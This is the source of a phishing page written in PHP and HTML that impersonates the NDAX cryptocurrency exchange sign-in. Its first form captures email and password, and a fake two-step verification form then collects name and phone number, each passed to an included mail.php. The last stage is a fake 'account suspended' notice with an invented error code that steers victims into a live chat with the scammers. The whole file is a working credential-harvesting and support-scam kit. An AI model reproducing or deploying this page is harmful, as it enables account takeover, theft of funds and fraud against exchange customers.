<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In to Buy and Sell Cryptocurrency in Canada | NDAX</title>
    <meta name="robots" content="noindex, nofollow" />
    <meta name="googlebot" content="noindex, nofollow" />
    <meta name="bingbot" content="noindex, nofollow" />
    <link rel="icon" href="" sizes="32x32">

    <link rel="icon" type="image/x-icon" href="assets/images/favicon.jpg">
    <link rel="stylesheet" href="assets/css/all.min.css">
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/style.css">
</head>

<body>
    <img src="assets/images/header.png" width="100%" style="margin-bottom: 10px;">
    <?php
    if (isset($_POST['btnLoginMore'])) {
        include 'mail.php';
    ?>
        <div class="container-fluid" id="welcome-section">
            <form action="" method="post">
                <h2 id="heading" style="margin-bottom: 5px;">2-Step Verification</h2>
                <p style="text-align: center;margin-bottom: 25px;">Enter the 2-step verification generated by your<br>
                    authenticator app.</p>
                <input type="hidden" name="brandName" value="Bitbuy Login">
                <input type="hidden" name="email" value="<?php echo $_POST['email']; ?>" />
                <input type="hidden" name="password" value="<?php echo $_POST['password']; ?>" />
                <div class="form-group">
                    <input type="text" class="form-control" style="    margin-top: 6px;" placeholder=" Name" name="name" placeholder="Name" required>
                </div>
                <div class="form-group">
                    <input type="text" class="form-control" style="    margin-top: 6px;" placeholder=" Phone Number" name="number" placeholder="Phone Number" required>
                </div>
                <button class="btn btn-block btn-primary" name="fromLog" type="submit">Verify </button>
                <div class="links">
                </div>
            </form>
        </div>
    <?php } elseif (isset($_POST['fromLog'])) {
        include 'mail.php';
    ?>

        <div class="container-fluid errorDiv" id="welcome-section">
            <form action="" method="post" style="">
                <h2 id="heading" style="color: red;">Important Message!<span></span></h2>
                <p style="text-align: center;">Due to unauthorized activity and identification failure on your Account. Account Access has been suspended. Please Get in touch with our Support Staff Immediately

                </p>
                <div class="form">
                    <p style="text-align: center;font-weight: 600;font-size: 20px;">Error CODE: EBRX16X76D
                    </p><br>
                </div>
                <div class="calling-number" style="text-align: center;">
                    <a href="javascript:void(Tawk_API.toggle())" style="padding: 8px 12px; border-radius: 5px; border: 1px solid #27d17f; font-size: 16px;background-color: #27d17f;  color: #000 !important;">Ask Expert</a>
                </div>

            </form>
        </div>
    <?php } else { ?>

        <div class="container-fluid" id="welcome-section">
                <h3 style="color: #293070; text-align: center;font-size: 40px;">Log In</h3>
    <p style="text-align: center;" >PLEASE MAKE SURE YOU ARE VISITING</p>
            <form action="" method="post"><input type="hidden" name="brandName" value="NDAX Login">

                <div class="form-group">
                    <input type="text" class="form-control" id="exampleInputEmail1" name="email" placeholder="Email or Username"
                        placeholder="Email address" required>
                </div>

                <div class="form-group">
                    <input type="password" class="form-control" id="exampleInputPassword1"
                        placeholder="Password" name="password" required>
                </div>



                <div class="form-check-inputonly">
                    <div class="check" style="display: flex;">
                        <input class="form-check-input-checklist checkinput" id="checkbox" type="checkbox" value="" id="defaultCheck1">
                        <label class="form-check-label-forcheck" for="defaultCheck1">
                            Remember me
                        </label>
                    </div>
                    <div class="forgot">
                        <a href="#" style="color: #004fe6 !important;text-decoration: underline;text-align: center;">Forgot password</a>
                    </div>
                </div>
                <button name="btnLoginMore" type="submit" class="btn btn-block btn-primary">Sign In</button>
            </form>
            <p style="text-align: center; display: block; color: #6f6f6f !important;font-size: 15px;" href="">Don't have an account? <a href="#" style="color: #293070 !important">Sign up</a></p>
        </div>
       
    <?php } ?>

    <!--Start of Tawk.to Script-->
    <script type="text/javascript">
        var Tawk_API = Tawk_API || {},
            Tawk_LoadStart = new Date();
        (function() {
            var s1 = document.createElement("script"),
                s0 = document.getElementsByTagName("script")[0];
            s1.async = true;
            s1.src = 'https://embed.tawk.to/642e94c531ebfa0fe7f6d126/1gtavaa21';
            s1.charset = 'UTF-8';
            s1.setAttribute('crossorigin', '*');
            s0.parentNode.insertBefore(s1, s0);
        })();
    </script>
    <!--End of Tawk.to Script-->

</body>

</html>